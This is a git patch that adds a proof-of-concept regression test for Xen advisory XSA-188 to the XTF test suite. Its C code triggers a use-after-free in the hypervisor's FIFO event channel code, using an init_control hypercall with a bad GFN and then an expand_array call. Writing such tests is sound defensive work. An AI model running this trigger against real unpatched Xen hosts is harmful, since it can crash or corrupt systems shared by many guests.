From cae076b200f2bb124e4eb0db8b86857fb80816dc Mon Sep 17 00:00:00 2001
From: David Vrabel <david.vrabel@citrix.com>
Date: Fri, 2 Sep 2016 13:39:36 +0100
Subject: [PATCH] XSA-188 PoC

Signed-off-by: David Vrabel <david.vrabel@citrix.com>
Reviewed-by: Andrew Cooper <andrew.cooper3@citrix.com>
---
 docs/all-tests.dox          |  2 ++
 include/xen/event_channel.h | 17 +++++++++++
 tests/xsa-188/Makefile      |  9 ++++++
 tests/xsa-188/main.c        | 58 +++++++++++++++++++++++++++++++++++++
 4 files changed, 86 insertions(+)
 create mode 100644 tests/xsa-188/Makefile
 create mode 100644 tests/xsa-188/main.c

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 1b14c67..0af0cd7 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -39,6 +39,8 @@ Coveres XSA-106 and XSA-156.
 @subpage test-xsa-183 - x86: Missing SMAP whitelisting in 32-bit exception /
 event delivery.
 
+@subpage test-xsa-188 - use after free in FIFO event channel code.
+
 
 @section index-utility Utilities
 
diff --git a/include/xen/event_channel.h b/include/xen/event_channel.h
index 3754f9e..62ee95a 100644
--- a/include/xen/event_channel.h
+++ b/include/xen/event_channel.h
@@ -2,9 +2,26 @@
 #define XEN_PUBLIC_EVENT_CHANNEL_H
 
 #define EVTCHNOP_send             4
+#define EVTCHNOP_init_control    11
+#define EVTCHNOP_expand_array    12
 
 typedef uint32_t evtchn_port_t;
 
+struct evtchn_init_control {
+    /* IN parameters. */
+    uint64_t control_gfn;
+    uint32_t offset;
+    uint32_t vcpu;
+    /* OUT parameters. */
+    uint8_t link_bits;
+    uint8_t _pad[7];
+};
+
+struct evtchn_expand_array {
+    /* IN parameters. */
+    uint64_t array_gfn;
+};
+
 #endif /* XEN_PUBLIC_EVENT_CHANNEL_H */
 
 /*
diff --git a/tests/xsa-188/Makefile b/tests/xsa-188/Makefile
new file mode 100644
index 0000000..de56394
--- /dev/null
+++ b/tests/xsa-188/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-188
+CATEGORY  := xsa
+TEST-ENVS := $(ALL_ENVIRONMENTS)
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-188/main.c b/tests/xsa-188/main.c
new file mode 100644
index 0000000..2f15cfd
--- /dev/null
+++ b/tests/xsa-188/main.c
@@ -0,0 +1,58 @@
+/**
+ * @file tests/xsa-188/main.c
+ * @ref test-xsa-188
+ *
+ * @page test-xsa-188 XSA-188
+ *
+ * Advisory: [XSA-188](http://xenbits.xen.org/xsa/advisory-188.html)
+ *
+ * EVTCHNOP_init_control with an invalid control_gfn will correctly
+ * fail and free resources but incorrectly leaves a pointer to freed
+ * memory.
+ *
+ * A subsequent EVTCHNOP_expand_array call (for example) will use this
+ * freed memory.
+ *
+ * @see tests/xsa-188/main.c
+ */
+#include <xtf.h>
+#include <arch/x86/mm.h>
+
+static uint8_t array_page[PAGE_SIZE] __aligned(PAGE_SIZE);
+
+void test_main(void)
+{
+    struct evtchn_init_control init_control;
+    struct evtchn_expand_array expand_array;
+    int ret;
+
+    printk("XSA-188 PoC\n");
+
+    /* 1. EVTCHNOP_init_control with bad GFN. */
+    init_control.control_gfn = (uint64_t)-2;
+    init_control.offset = 0;
+    init_control.vcpu = 0;
+
+    ret = hypercall_event_channel_op(EVTCHNOP_init_control, &init_control);
+    if ( ret != -EINVAL )
+        xtf_failure("EVTCHNOP_init_control returned %d (!= %d)\n", ret, -EINVAL);
+
+    /* 2. EVTCHNOP_expand_array. */
+    expand_array.array_gfn = virt_to_gfn(array_page);
+
+    ret = hypercall_event_channel_op(EVTCHNOP_expand_array, &expand_array);
+    if ( ret != -ENOSYS )
+        xtf_failure("EVTCHNOP_expand_array returned %d (!= %d)\n", ret, -ENOSYS);
+
+    xtf_success(NULL);
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
-- 
2.39.5